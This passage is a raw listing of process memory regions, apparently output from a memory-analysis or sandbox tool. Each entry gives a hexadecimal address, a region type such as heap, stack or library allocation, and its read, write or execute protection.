1B5C2840000
heap
page read and write
2533EA22000
heap
page read and write
235D1830000
heap
page read and write
24133B94000
heap
page read and write
2089B0A4000
heap
page read and write
7FFE15CA0000
trusted library allocation
page read and write
FC5197E000
stack
page read and write
2413365C000
heap
page read and write
1984D11A000
heap
page read and write
2125C3B1000
heap
page read and write
161A975B000
trusted library allocation
page read and write
1616FC61000
heap
page read and write
23639C00000
heap
page read and write
2413366B000
heap
page read and write
CB30EFF000
stack
page read and write
24133EF6000
heap
page read and write
2413354C000
heap
page read and write
20D80790000
heap
page read and write
24133483000
heap
page read and write
24132C4B000
heap
page read and write
24133675000
heap
page read and write
23753674000
heap
page read and write
1F16B90C000
heap
page read and write
21A1A160000
heap
page read and write
2413343B000
heap
page read and write
270AE60E000
heap
page read and write
1DBD7D32000
heap
page read and write
2C160AA0000
heap
page read and write
1F16D1A2000
heap
page read and write
2D87BDAD000
heap
page read and write
18859B87000
heap
page read and write
1F877FB6000
heap
page read and write
24132BFE000
heap
page read and write
2F8ECFE000
stack
page read and write
2D810031000
trusted library allocation
page read and write
220FF031000
heap
page read and write
1DA0082A000
heap
page read and write
152B52CB000
heap
page read and write
23639988000
heap
page read and write
270AE68E000
heap
page read and write
18859B9E000
heap
page read and write
1616DE29000
heap
page read and write
20492ACE000
heap
page read and write
2413394C000
direct allocation
page read and write
7FFE15E30000
trusted library allocation
page read and write
24132B90000
heap
page read and write
1E02DCC1000
heap
page read and write
20492B15000
heap
page read and write
19851DC0000
trusted library allocation
page read and write
1F1A8AD1000
heap
page read and write
2533F289000
heap
page read and write
7FFE76184000
unkown
page execute and read and write
2B4B8910000
heap
page read and write
20492A9C000
heap
page read and write
1AEA6E04000
heap
page read and write
29197284000
heap
page read and write
53F78FC000
stack
page read and write
1AEA6E13000
heap
page read and write
1DACEF57000
heap
page read and write
1DBD84D2000
heap
page read and write
2D80022A000
trusted library allocation
page read and write
270AE643000
heap
page read and write
1DACF03E000
heap
page read and write
20492B27000
heap
page read and write
24133539000
heap
page read and write
1DAD0142000
heap
page read and write
24133F59000
heap
page read and write
270AE5B4000
heap
page read and write
2533F11E000
heap
page read and write
1DBD7C50000
heap
page read and write
2533E9E7000
heap
page read and write
1984D002000
heap
page read and write
1DA00230000
heap
page read and write
1FAC14FE000
heap
page read and write
2B4B8780000
heap
page read and write
2089AFA9000
heap
page read and write
241337B0000
direct allocation
page read and write
253DC430000
direct allocation
page read and write
7FFE15E4C000
trusted library allocation
page read and write
1616DE19000
heap
page read and write
174CED4B000
heap
page read and write
24133471000
heap
page read and write
7DF456B00000
trusted library allocation
page execute and read and write
2413347E000
heap
page read and write
20492AEE000
heap
page read and write
152B52E1000
heap
page read and write
1DACCF33000
heap
page read and write
2413355D000
heap
page read and write
7FFE761B1000
unkown
page execute and write copy
2125DD30000
heap
page read and write
253DC4F0000
direct allocation
page read and write
1DBD7CA5000
heap
page read and write
24133DA8000
heap
page read and write
7FFE15D50000
trusted library allocation
page read and write
2221A581000
heap
page read and write
2360FC95000
heap
page read and write
20C95670000
heap
page read and write
18859EA0000
heap
page read and write
2221A581000
heap
page read and write
20492ACE000
heap
page read and write
1ED0FCF8000
heap
page read and write
24132B9B000
heap
page read and write
2089AFA9000
heap
page read and write
1FABF628000
heap
page read and write
1616DCB2000
heap
page read and write
1DAD0180000
heap
page read and write
7FFE15D40000
trusted library allocation
page read and write
241334B0000
heap
page read and write
2533EC00000
heap
page read and write
24133D21000
heap
page read and write
270AEF79000
heap
page read and write
1F16B228000
heap
page read and write
2089AF80000
heap
page read and write
29ADF580000
heap
page read and write
1ED47214000
heap
page read and write
FC5244E000
stack
page read and write
1ED47239000
heap
page read and write
1F61A644000
heap
page read and write
24133F7F000
heap
page read and write
7FFE8FF61000
unkown
page execute and read and write
161B16E6000
heap
page read and write
BEDBBFF000
stack
page read and write
1DA00827000
heap
page read and write
1FABFC84000
heap
page read and write
24133669000
heap
page read and write
24132FF9000
heap
page read and write
24133F8F000
heap
page read and write
29AF1C51000
heap
page read and write
241333A0000
heap
page read and write
1B7EED21000
heap
page read and write
20C94870000
heap
page read and write
EA7447D000
stack
page read and write
1ED46B70000
trusted library allocation
page read and write
270AE612000
heap
page read and write
24132C14000
heap
page read and write
24133657000
heap
page read and write
1869CAD0000
heap
page read and write
1F16D1B4000
heap
page read and write
1F16B918000
heap
page read and write
24133F29000
heap
page read and write
2D87C0AF000
heap
page read and write
1DF54D21000
heap
page read and write
19852040000
heap
page read and write
1DA002CB000
heap
page read and write
270AE719000
heap
page read and write
7FFE761A0000
unkown
page execute and read and write
2533F11A000
heap
page read and write
1DA00823000
heap
page read and write
24133D21000
heap
page read and write
2360FCBC000
heap
page read and write
24133486000
heap
page read and write
7FF7C7288000
unkown
page readonly
CD4FA7F000
stack
page read and write
1E2C988F000
heap
page read and write
24133387000
heap
page read and write
20D80785000
heap
page read and write
22E8B6B0000
heap
page read and write
20492AB9000
heap
page read and write
1FABF67C000
heap
page read and write
1CFB9488000
heap
page read and write
20494503000
trusted library allocation
page read and write
16197868000
heap
page read and write
7984AFF000
stack
page read and write
1DAD09BF000
heap
page read and write
24130AA4000
heap
page read and write
2125C390000
heap
page read and write
2533F294000
heap
page read and write
24133495000
heap
page read and write
20492AEE000
heap
page read and write
1619B399000
trusted library allocation
page read and write
29AF1C30000
heap
page read and write
253D8E68000
heap
page read and write
20C95746000
heap
page read and write
2049450B000
trusted library allocation
page read and write
7FF6FFC92000
unkown
page read and write
1616DDE5000
heap
page read and write
24133675000
heap
page read and write
270AF0E3000
heap
page read and write
20C94ADD000
trusted library allocation
page read and write
1CFB9491000
heap
page read and write
20C9566C000
heap
page read and write
1E2C9AC0000
heap
page read and write
287A39C1000
heap
page read and write
1F61A3C0000
heap
page read and write
24132C07000
heap
page read and write
24130A5D000
heap
page read and write
270AF335000
heap
page read and write
12770FE000
stack
page read and write
1F16B252000
heap
page read and write
2221A680000
heap
page read and write
1FABF66C000
heap
page read and write
2533F117000
heap
page read and write
1984D8C0000
trusted library allocation
page read and write
2533EA26000
heap
page read and write
20494503000
trusted library allocation
page read and write
1DBD7C88000
heap
page read and write
241334DB000
heap
page read and write
1DBD7CF3000
heap
page read and write
1ED47228000
heap
page read and write
2533EA4E000
heap
page read and write
2D87B6D0000
trusted library allocation
page read and write
1E2C9820000
heap
page read and write
24130A5D000
heap
page read and write
161B1C91000
heap
page read and write
253D8E06000
heap
page read and write
1DACCFAB000
heap
page read and write
20492B16000
heap
page read and write
1E2C989E000
heap
page read and write
7FFE957E1000
unkown
page readonly
1AEA6EF0000
heap
page read and write
2533F299000
heap
page read and write
2D87BD02000
heap
page read and write
287A39AD000
heap
page read and write
270AEF4B000
heap
page read and write
270AE4C0000
heap
page read and write
2D8004D1000
trusted library allocation
page read and write
20D80588000
heap
page read and write
24133F9D000
heap
page read and write
2D87C025000
heap
page read and write
1FABF68F000
heap
page read and write
1DAD0180000
heap
page read and write
2360FC95000
heap
page read and write
3B0557F000
stack
page read and write
2533F11A000
heap
page read and write
88EE57E000
unkown
page readonly
2413390C000
direct allocation
page read and write
20494524000
heap
page read and write
270AE68E000
heap
page read and write
20492B32000
heap
page read and write
2413354A000
heap
page read and write
1616DDE7000
heap
page read and write
23639920000
heap
page read and write
2089AF9D000
heap
page read and write
1DAD00A1000
heap
page read and write
24133483000
heap
page read and write
7FF6FFC7B000
unkown
page readonly
17134AFB000
heap
page read and write
24133FB6000
heap
page read and write
241333C8000
heap
page read and write
2089AFAA000
heap
page read and write
20492A94000
heap
page read and write
1ED48B0E000
heap
page read and write
C68D4FF000
stack
page read and write
19851DF0000
trusted library allocation
page read and write
24133565000
heap
page read and write
244380F0000
heap
page read and write
2413350D000
heap
page read and write
2D8102F3000
trusted library allocation
page read and write
1DA0082A000
heap
page read and write
253D8FD0000
direct allocation
page read and write
241334A0000
heap
page read and write
241333B0000
heap
page read and write
235D1640000
heap
page read and write
174CED57000
heap
page read and write
24132C4F000
heap
page read and write
241333F6000
heap
page read and write
287A3C75000
heap
page read and write
20492B6E000
heap
page read and write
24133D27000
heap
page read and write
AB1B47B000
stack
page read and write
5F12FF000
stack
page read and write
20492B33000
heap
page read and write
7FFE15C60000
trusted library allocation
page execute and read and write
1984C891000
heap
page read and write
29425FB4000
heap
page read and write
1ED46C0B000
heap
page read and write
241333CD000
heap
page read and write
2089C990000
heap
page read and write
24132B8D000
heap
page read and write
24133496000
heap
page read and write
2533ECDD000
heap
page read and write
24133954000
direct allocation
page read and write
2533EA39000
heap
page read and write
6882FB000
stack
page read and write
241334A4000
heap
page read and write
7FFE765BD000
unkown
page execute and read and write
8FB2DFE000
unkown
page read and write
1ED48B14000
heap
page read and write
20D80560000
heap
page read and write
1F61A3F5000
heap
page read and write
24133B11000
heap
page read and write
2089C993000
heap
page read and write
20C94887000
heap
page read and write
12771FF000
stack
page read and write
7FFE15BD0000
trusted library allocation
page execute and read and write
1616DD60000
heap
page read and write
1FABF662000
heap
page read and write
2533F289000
heap
page read and write
2089AFB2000
heap
page read and write
C9785FF000
unkown
page read and write
241333C6000
heap
page read and write
174CED71000
heap
page read and write
1BFE6CE1000
heap
page read and write
5F11FE000
stack
page read and write
24133539000
heap
page read and write
1DACF03E000
heap
page read and write
1DBD7E80000
trusted library allocation
page read and write
2C160BC4000
heap
page read and write
1616DC57000
heap
page read and write
2D87BF50000
heap
page read and write
1DAD0132000
heap
page read and write
1FABF646000
heap
page read and write
2533F26E000
heap
page read and write
24133001000
heap
page read and write
270AE643000
heap
page read and write
22E8B5D0000
heap
page read and write
A2B51FE000
stack
page read and write
270AE62C000
heap
page read and write
1F16B1B0000
trusted library allocation
page read and write
18859B9D000
heap
page read and write
18207E24000
heap
page read and write
5D5D0FE000
stack
page read and write
ECBC8FF000
unkown
page read and write
2D87BDBB000
heap
page read and write
1FABFC89000
heap
page read and write
281B5DB8000
heap
page read and write
17134AED000
heap
page read and write
24132C3D000
heap
page read and write
24132C13000
heap
page read and write
2C160BA0000
heap
page read and write
1ED46B70000
trusted library allocation
page read and write
270AEF4E000
heap
page read and write
7FFE764AC000
unkown
page execute and read and write
88ED277000
stack
page read and write
2533F271000
heap
page read and write
1616DDB0000
heap
page read and write
1DA02126000
heap
page read and write
109D47E000
stack
page read and write
22E8B790000
heap
page read and write
18859B9D000
heap
page read and write
7FFE75D2E000
unkown
page execute and read and write
253DC51D000
direct allocation
page read and write
1DBD7D2C000
heap
page read and write
2413348F000
heap
page read and write
2413351B000
heap
page read and write
7FFE8FF74000
unkown
page read and write
7FFE15CC0000
trusted library allocation
page read and write
2985FFE000
stack
page read and write
24AB72A0000
heap
page read and write
24132C00000
heap
page read and write
CC065FF000
unkown
page read and write
1F16B25C000
heap
page read and write
24133562000
heap
page read and write
8FB2EFF000
stack
page read and write
2413344D000
heap
page read and write
C2A0A7E000
stack
page read and write
1ED47239000
heap
page read and write
253D8E03000
heap
page read and write
1DF54EE0000
heap
page read and write
2263E4D0000
heap
page read and write
1616DCB7000
heap
page read and write
235D1751000
heap
page read and write
24133516000
heap
page read and write
20C94ACE000
trusted library allocation
page read and write
1984D015000
heap
page read and write
253D8E5C000
heap
page read and write
1DBD7C96000
heap
page read and write
1DAD0192000
heap
page read and write
18859B50000
heap
page read and write
24133EF6000
heap
page read and write
7FFE760AD000
unkown
page execute and read and write
1ED47200000
heap
page read and write
1F61A41D000
heap
page read and write
174CED45000
heap
page read and write
1DBD7D1B000
heap
page read and write
2D801E25000
trusted library allocation
page read and write
2D87B910000
heap
page execute and read and write
2C160D34000
heap
page read and write
20C94AC0000
trusted library allocation
page read and write
1984C874000
heap
page read and write
1E2C9879000
heap
page read and write
20492AEC000
heap
page read and write
7FFE75E61000
unkown
page execute and read and write
1DACCFAE000
heap
page read and write
1FABFC6E000
heap
page read and write
7FFE7865A000
unkown
page read and write
1DBD9E74000
heap
page read and write
6E733CE000
stack
page read and write
DFDE58C000
stack
page read and write
20492B27000
heap
page read and write
1DA002AC000
heap
page read and write
24133EC2000
heap
page read and write
1F61A640000
heap
page read and write
24130A63000
heap
page read and write
20492B32000
heap
page read and write
24133472000
heap
page read and write
55CA8FF000
stack
page read and write
1F16B241000
heap
page read and write
2D87BE47000
heap
page execute and read and write
2089AAA8000
heap
page read and write
2D87BF60000
heap
page read and write
270AF23F000
heap
page read and write
241334A6000
heap
page read and write
161B1C96000
heap
page read and write
1F16B160000
heap
page read and write
1FABF688000
heap
page read and write
20492AEC000
heap
page read and write
2089AF8E000
heap
page read and write
1DAD0180000
heap
page read and write
20C95602000
heap
page read and write
3A74DDF000
stack
page read and write
24133565000
heap
page read and write
24EACFF0000
heap
page read and write
21A1A211000
heap
page read and write
20C94ADD000
trusted library allocation
page read and write
7FFE75E43000
unkown
page execute and read and write
2533F114000
heap
page read and write
1DB1C550000
heap
page read and write
24133FCA000
heap
page read and write
1DBD7C86000
heap
page read and write
2360FC85000
heap
page read and write
2125C3B1000
heap
page read and write
1C8A6040000
heap
page read and write
152B5200000
heap
page read and write
241334A0000
heap
page read and write
24133525000
heap
page read and write
24132C10000
heap
page read and write
1F16D1A1000
heap
page read and write
1F877FA9000
heap
page read and write
20C94C62000
trusted library allocation
page read and write
270AE68E000
heap
page read and write
24133FD4000
heap
page read and write
1CFB9725000
heap
page read and write
2533EA3C000
heap
page read and write
2125C360000
heap
page read and write
DADE8FC000
stack
page read and write
2049450E000
trusted library allocation
page read and write
1DBD7EB0000
heap
page read and write
1DA002B4000
heap
page read and write
1AEA6E0C000
heap
page read and write
253D8DFC000
heap
page read and write
253D8DC9000
heap
page read and write
24133657000
heap
page read and write
2533F299000
heap
page read and write
1C3C5A10000
heap
page read and write
17134AD6000
heap
page read and write
20C94AC7000
trusted library allocation
page read and write
20492B27000
heap
page read and write
24133565000
heap
page read and write
1DBD7CA7000
heap
page read and write
23639930000
heap
page read and write
1DA00062000
heap
page read and write
2533EA04000
heap
page read and write
270AE629000
heap
page read and write
20C95618000
heap
page read and write
24132C00000
heap
page read and write
24133393000
heap
page read and write
24133539000
heap
page read and write
7FFE15F10000
trusted library allocation
page execute and read and write
253DC510000
direct allocation
page read and write
20C95670000
heap
page read and write
1FABF67A000
heap
page read and write
2089C99E000
heap
page read and write
1DBD837A000
heap
page read and write
253DC310000
direct allocation
page read and write
17134BA0000
heap
page read and write
53F79FF000
unkown
page read and write
24132EEC000
heap
page read and write
1E02DC50000
heap
page read and write
20C94AD1000
trusted library allocation
page read and write
2125C3B1000
heap
page read and write
F7880FF000
unkown
page read and write
18207AD1000
heap
page read and write
2089AF98000
heap
page read and write
1DBD7D2C000
heap
page read and write
2D810001000
trusted library allocation
page read and write
20494506000
trusted library allocation
page read and write
24133473000
heap
page read and write
20492AF5000
heap
page read and write
1ED4721D000
heap
page read and write
2049452E000
heap
page read and write
7FFE15E13000
trusted library allocation
page read and write
20492AEC000
heap
page read and write
241334B0000
heap
page read and write
24ECC4A0000
heap
page read and write
1E02DCC1000
heap
page read and write
253DC4B0000
direct allocation
page read and write
D5772FF000
stack
page read and write
24132FE8000
heap
page read and write
2533EA10000
heap
page read and write
2089AABC000
heap
page read and write
1DA002D4000
heap
page read and write
2533F289000
heap
page read and write
DADEAFF000
stack
page read and write
2413351E000
heap
page read and write
24133970000
direct allocation
page read and write
6051FCF000
stack
page read and write
1ED48B04000
heap
page read and write
1DA02111000
heap
page read and write
20C94ADA000
trusted library allocation
page read and write
2413340C000
heap
page read and write
2D87C039000
heap
page read and write
1DACCF4C000
heap
page read and write
270AF248000
heap
page read and write
7FFE15B50000
trusted library allocation
page execute and read and write
1DBD7C62000
heap
page read and write
1AEA6FF0000
heap
page read and write
2413365E000
heap
page read and write
253D8E08000
heap
page read and write
235D16A4000
heap
page read and write
24132C31000
heap
page read and write
7FFE15D60000
trusted library allocation
page read and write
1DA00092000
heap
page read and write
24133565000
heap
page read and write
1FABF646000
heap
page read and write
24132C4B000
heap
page read and write
1F16B8FA000
heap
page read and write
2533ECDE000
heap
page read and write
18859BA1000
heap
page read and write
2089C992000
heap
page read and write
18FDFCD1000
heap
page read and write
241309F1000
heap
page read and write
1ED48B06000
heap
page read and write
2125C3B1000
heap
page read and write
1ED46C29000
heap
page read and write
7FF7C71E0000
unkown
page readonly
7FFE75D95000
unkown
page execute and write copy
24133041000
heap
page read and write
2089C9A4000
heap
page read and write
241334EA000
heap
page read and write
1BFE6CB5000
heap
page read and write
241333CC000
heap
page read and write
1DA0004E000
heap
page read and write
20C95757000
heap
page read and write
7FFE78657000
unkown
page execute and read and write
7FFE15F40000
trusted library allocation
page read and write
7FFE15DF0000
trusted library allocation
page read and write
253DC492000
direct allocation
page read and write
17134AFB000
heap
page read and write
24133392000
heap
page read and write
1C46EC31000
heap
page read and write
235D1751000
heap
page read and write
966097F000
stack
page read and write
241333BA000
heap
page read and write
1F16B241000
heap
page read and write
270AE612000
heap
page read and write
2089C99E000
heap
page read and write
1616DD80000
trusted library allocation
page read and write
2533E9C0000
trusted library allocation
page read and write
96608FF000
stack
page read and write
29425FB0000
heap
page read and write
2089AF88000
heap
page read and write
24130A60000
heap
page read and write
20C95613000
heap
page read and write
2D87B7A0000
heap
page read and write
24133539000
heap
page read and write
24133463000
heap
page read and write
24132C62000
heap
page read and write
270AEF81000
heap
page read and write
20492B64000
heap
page read and write
1DACEF56000
heap
page read and write
24133651000
heap
page read and write
1F16B932000
heap
page read and write
1DBD7CA7000
heap
page read and write
1FABF67C000
heap
page read and write
16197862000
heap
page read and write
7FFE15E60000
trusted library allocation
page read and write
23FDEEB0000
heap
page read and write
C2A08FE000
stack
page read and write
1C8A6060000
heap
page read and write
24133674000
heap
page read and write
24133B93000
heap
page read and write
1DAD0192000
heap
page read and write
7FFE15D60000
trusted library allocation
page read and write
24133496000
heap
page read and write
2B4B8931000
heap
page read and write
24133521000
heap
page read and write
1FDEF110000
heap
page read and write
270AEF4C000
heap
page read and write
1FABFC50000
heap
page read and write
1CFB9450000
heap
page read and write
24132C56000
heap
page read and write
2049452D000
heap
page read and write
7EA973C000
stack
page read and write
241333A0000
heap
page read and write
2533EA37000
heap
page read and write
2089AAA2000
heap
page read and write
24133393000
heap
page read and write
1F877FB6000
heap
page read and write
1616FC76000
heap
page read and write
2533F27E000
heap
page read and write
29AF1C49000
heap
page read and write
220FF029000
heap
page read and write
291970A0000
heap
page read and write
241334EF000
heap
page read and write
1DBD9E62000
heap
page read and write
1DBD84F2000
heap
page read and write
1ED46C20000
heap
page read and write
152B5220000
heap
page read and write
1616DC97000
heap
page read and write
198520DC000
heap
page read and write
1616DC97000
heap
page read and write
1616DDFC000
heap
page read and write
1DA0211E000
heap
page read and write
1CAA7D10000
heap
page read and write
1FDEF410000
heap
page read and write
7FFE15DA0000
trusted library allocation
page read and write
24133F9C000
heap
page read and write
1DBD7CEC000
heap
page read and write
1F877F9D000
heap
page read and write
1C3C58F0000
heap
page read and write
1DACCF36000
heap
page read and write
20C94ACF000
trusted library allocation
page read and write
18859BA2000
heap
page read and write
20C955F0000
heap
page read and write
1DBD9E6D000
heap
page read and write
2B4B8931000
heap
page read and write
1ED46C9E000
heap
page read and write
24133D27000
heap
page read and write
1DAD0164000
heap
page read and write
1AEA6E41000
heap
page read and write
24ECC260000
heap
page read and write
24130A40000
heap
page read and write
F5872FF000
stack
page read and write
24133546000
heap
page read and write
2413350B000
heap
page read and write
2125C398000
heap
page read and write
1DBD84D5000
heap
page read and write
20D80570000
heap
page read and write
241323E0000
heap
page read and write
23753440000
heap
page read and write
270AE5C1000
heap
page read and write
2089AA83000
heap
page read and write
1B7EED18000
heap
page read and write
24EAD1A0000
heap
page read and write
1ED46C0A000
heap
page read and write
21A1A500000
heap
page read and write
253D8E1C000
heap
page read and write
2360FCB7000
heap
page read and write
241334A0000
heap
page read and write
18D34750000
heap
page read and write
2089AF9D000
heap
page read and write
20D80591000
heap
page read and write
24132C19000
heap
page read and write
1C3C591B000
heap
page read and write
20C94C60000
heap
page read and write
20C94ADD000
trusted library allocation
page read and write
7FFE8FF95000
unkown
page execute and read and write
1ED46C58000
heap
page read and write
1ED46C8C000
heap
page read and write
16197A00000
trusted library allocation
page read and write
1DBD7C67000
heap
page read and write
241333F6000
heap
page read and write
1DA003AA000
heap
page read and write
1CFB9470000
heap
page read and write
1CFB9440000
heap
page read and write
152B52E1000
heap
page read and write
1F16B420000
heap
page read and write
1CFB9491000
heap
page read and write
1984D301000
trusted library allocation
page read and write
2533EA33000
heap
page read and write
1984C85B000
heap
page read and write
24130A63000
heap
page read and write
19852098000
heap
page read and write
1DBD7CA7000
heap
page read and write
7FFE8FF67000
unkown
page execute and read and write
1616DE19000
heap
page read and write
2413351F000
heap
page read and write
1C8A6060000
heap
page read and write
7FFE78642000
unkown
page execute and read and write
24133496000
heap
page read and write
220FF031000
heap
page read and write
161978AD000
heap
page read and write
241334A4000
heap
page read and write
1616DCA3000
heap
page read and write
23FDF2F4000
heap
page read and write
18207AB0000
heap
page read and write
21A1A211000
heap
page read and write
1F61A40D000
heap
page read and write
1F61A41D000
heap
page read and write
1984D100000
heap
page read and write
1E2C9870000
heap
page read and write
3A0E0FE000
stack
page read and write
241333CB000
heap
page read and write
1616DE19000
heap
page read and write
C2A087D000
stack
page read and write
270AE68E000
heap
page read and write
2413340C000
heap
page read and write
1F16B1B0000
trusted library allocation
page read and write
24133506000
heap
page read and write
270AEF55000
heap
page read and write
1FABF67B000
heap
page read and write
1ED4720C000
heap
page read and write
24132C0F000
heap
page read and write
88ED57E000
unkown
page readonly
1F1A8D75000
heap
page read and write
20492B1E000
heap
page read and write
23753462000
heap
page read and write
1AEA6E28000
heap
page read and write
5D5D07E000
stack
page read and write
270AEF61000
heap
page read and write
24132C07000
heap
page read and write
2360FC8B000
heap
page read and write
C2A097F000
stack
page read and write
241334A0000
heap
page read and write
241334F6000
heap
page read and write
21A1A1FB000
heap
page read and write
253D8E7F000
heap
page read and write
1DAD015A000
heap
page read and write
1DB1C720000
heap
page read and write
F5871FF000
unkown
page read and write
1CAA7D71000
heap
page read and write
1DBD7D24000
heap
page read and write
18207AD1000
heap
page read and write
1616DC97000
heap
page read and write
270AE5B7000
heap
page read and write
3A0DEF7000
stack
page read and write
1DA00083000
heap
page read and write
2D879C30000
heap
page read and write
7FFE15D20000
trusted library allocation
page read and write
88EDD7E000
unkown
page readonly
20C94C63000
trusted library allocation
page read and write
88EED7E000
unkown
page readonly
1E2C9860000
heap
page read and write
24130A63000
heap
page read and write
20C9488E000
heap
page read and write
1B5C25B1000
heap
page read and write
1C8A6060000
heap
page read and write
1F61A3F5000
heap
page read and write
24132C31000
heap
page read and write
2D87BD04000
heap
page read and write
6E72FD8000
stack
page read and write
1F16B265000
heap
page read and write
2089B0AA000
heap
page read and write
1E02DCB9000
heap
page read and write
2533F11B000
heap
page read and write
2263E3D0000
heap
page read and write
1FABF662000
heap
page read and write
2413352F000
heap
page read and write
20492B59000
heap
page read and write
20C95654000
heap
page read and write
F430FFF000
unkown
page read and write
2D800F15000
trusted library allocation
page read and write
7FF6FFC50000
unkown
page readonly
1ED4722B000
heap
page read and write
2533EA42000
heap
page read and write
24132BD0000
heap
page read and write
1C8A6020000
heap
page read and write
1D3E25AD000
heap
page read and write
EA7457F000
stack
page read and write
226F4CE0000
heap
page read and write
7FFE7663C000
unkown
page read and write
16199280000
trusted library allocation
page read and write
1F16B1F7000
heap
page read and write
24133556000
heap
page read and write
24ECC2D8000
heap
page read and write
A9298FF000
stack
page read and write
20D80591000
heap
page read and write
7FFE75ED9000
unkown
page execute and read and write
1DA00043000
heap
page read and write
241334A6000
heap
page read and write
1B5C2570000
heap
page read and write
24EACF50000
heap
page read and write
2089AAB1000
heap
page read and write
21A1A211000
heap
page read and write
2533F115000
heap
page read and write
1985210A000
heap
page read and write
2360FC99000
heap
page read and write
2413347E000
heap
page read and write
253D90A4000
heap
page read and write
1FABF64F000
heap
page read and write
2413352D000
heap
page read and write
23FDF091000
heap
page read and write
20492B1E000
heap
page read and write
88EE4FE000
stack
page read and write
24AB7320000
heap
page read and write
19851F30000
trusted library allocation
page read and write
20C94ADB000
trusted library allocation
page read and write
24133657000
heap
page read and write
270AF0EB000
heap
page read and write
5E5A12B000
stack
page read and write
24133539000
heap
page read and write
161996E1000
trusted library allocation
page read and write
1FABF8EE000
heap
page read and write
24130A5D000
heap
page read and write
24133501000
heap
page read and write
24130A5D000
heap
page read and write
1DB1C724000
heap
page read and write
1E777AB0000
heap
page read and write
18FDFEA4000
heap
page read and write
20C9566C000
heap
page read and write
22E8B870000
heap
page read and write
1F16B1FF000
heap
page read and write
24133948000
direct allocation
page read and write
2413350C000
heap
page read and write
2089AB40000
trusted library allocation
page read and write
270AE649000
heap
page read and write
20C95752000
heap
page read and write
1ED46C89000
heap
page read and write
1E02DCB8000
heap
page read and write
1ED47228000
heap
page read and write
7FF6FFC7B000
unkown
page readonly
198520EA000
heap
page read and write
1FABFC64000
heap
page read and write
19851EA0000
trusted library allocation
page read and write
1F16B266000
heap
page read and write
24132C14000
heap
page read and write
20C9574A000
heap
page read and write
253D8E79000
heap
page read and write
2413352D000
heap
page read and write
7C2DAFE000
stack
page read and write
7FFE15DD0000
trusted library allocation
page read and write
2360FCAC000
heap
page read and write
2089AA20000
trusted library allocation
page read and write
24132C00000
heap
page read and write
241333BD000
heap
page read and write
17134AA9000
heap
page read and write
1DACCDD0000
heap
page read and write
7FFE15C39000
trusted library allocation
page read and write
24132F71000
heap
page read and write
24133B10000
heap
page read and write
1DA003AD000
heap
page read and write
7FFE15D90000
trusted library allocation
page read and write
24133495000
heap
page read and write
253D8E61000
heap
page read and write
6883FF000
unkown
page read and write
2533F26C000
heap
page read and write
20492B66000
heap
page read and write
24130A6A000
heap
page read and write
241334E9000
heap
page read and write
1F16B907000
heap
page read and write
24134310000
heap
page read and write
23FDF088000
heap
page read and write
20492ACE000
heap
page read and write
7FFE99E51000
unkown
page execute and read and write
1C46EC31000
heap
page read and write
2413351A000
heap
page read and write
1F16B260000
heap
page read and write
7FF7C71E1000
unkown
page execute read
220FF031000
heap
page read and write
76DEAFF000
unkown
page read and write
20C9560A000
heap
page read and write
1F16D1AE000
heap
page read and write
20494507000
trusted library allocation
page read and write
2413354D000
heap
page read and write
24132BF8000
heap
page read and write
1FABF68A000
heap
page read and write
109D97B000
stack
page read and write
24133674000
heap
page read and write
7FFE15DC0000
trusted library allocation
page read and write
20492AEE000
heap
page read and write
270AF330000
heap
page read and write
1E2C990E000
heap
page read and write
152B52E1000
heap
page read and write
1DA003A0000
heap
page read and write
2263E5D1000
heap
page read and write
24133551000
heap
page read and write
1FABF8EE000
heap
page read and write
1BFE6B40000
heap
page read and write
1F1A8AF3000
heap
page read and write
2049452D000
heap
page read and write
87B307C000
stack
page read and write
1DACCFAE000
heap
page read and write
20492B58000
heap
page read and write
2533EA3D000
heap
page read and write
2D87B7A4000
heap
page read and write
7FFE15AAB000
trusted library allocation
page read and write
1616DC78000
heap
page read and write
18207AD1000
heap
page read and write
18859EA4000
heap
page read and write
20492B12000
heap
page read and write
1BFE6CE1000
heap
page read and write
1616FC6E000
heap
page read and write
16199AF1000
trusted library allocation
page read and write
1DA002D9000
heap
page read and write
241335A9000
heap
page read and write
24130A5D000
heap
page read and write
2263E5CB000
heap
page read and write
24130A5D000
heap
page read and write
2413342B000
heap
page read and write
1DAD014A000
heap
page read and write
174CED76000
heap
page read and write
253DC3F0000
direct allocation
page read and write
174CED76000
heap
page read and write
1DBD8370000
heap
page read and write
1FABF8E7000
heap
page read and write
A2B4BB8000
stack
page read and write
1DA000A1000
heap
page read and write
270AEF79000
heap
page read and write
24133519000
heap
page read and write
1AEA7144000
heap
page read and write
284F3400000
heap
page read and write
24133363000
heap
page read and write
1F16B296000
heap
page read and write
2413352D000
heap
page read and write
69F5EFF000
stack
page read and write
1E2C98D5000
heap
page read and write
24130A44000
heap
page read and write
2533F27E000
heap
page read and write
1616DDFF000
heap
page read and write
1DBD7D24000
heap
page read and write
270AF0E4000
heap
page read and write
1869CB6D000
heap
page read and write
174CED45000
heap
page read and write
2089AAA2000
heap
page read and write
1DBD9E63000
heap
page read and write
2413352D000
heap
page read and write
1FABF687000
heap
page read and write
253D8E0C000
heap
page read and write
24133521000
heap
page read and write
271488D0000
heap
page read and write
BE08CFC000
stack
page read and write
7FFE15E34000
trusted library allocation
page read and write
1ED4721D000
heap
page read and write
2413350C000
heap
page read and write
24132340000
heap
page read and write
24133F8D000
heap
page read and write
1DA0008A000
heap
page read and write
29AF1C4A000
heap
page read and write
7FFE15D30000
trusted library allocation
page read and write
18D34920000
heap
page read and write
2D800D43000
trusted library allocation
page read and write
1616DC95000
heap
page read and write
1DBD7D24000
heap
page read and write
1C46EBF0000
heap
page read and write
2089AA00000
heap
page read and write
20C95621000
heap
page read and write
253D9017000
direct allocation
page read and write
1DAD01DC000
heap
page read and write
20492B66000
heap
page read and write
109D678000
stack
page read and write
2413366B000
heap
page read and write
2360FCB8000
heap
page read and write
41A9E7F000
stack
page read and write
2089AA9A000
heap
page read and write
1CAA7D71000
heap
page read and write
1FABFC67000
heap
page read and write
1DBD84E9000
heap
page read and write
20C95622000
heap
page read and write
24132E80000
heap
page read and write
109CFAF000
stack
page read and write
1DBD84F7000
heap
page read and write
24133516000
heap
page read and write
7FFE7660A000
unkown
page execute and read and write
24132C41000
heap
page read and write
20492AC0000
heap
page read and write
24133950000
direct allocation
page read and write
270AEF72000
heap
page read and write
2125C280000
heap
page read and write
20492B59000
heap
page read and write
1984D113000
heap
page read and write
20C95685000
heap
page read and write
1F16B294000
heap
page read and write
2125C3B1000
heap
page read and write
24132C3E000
heap
page read and write
2413344D000
heap
page read and write
241333B5000
heap
page read and write
29196FC1000
heap
page read and write
7B4EF7F000
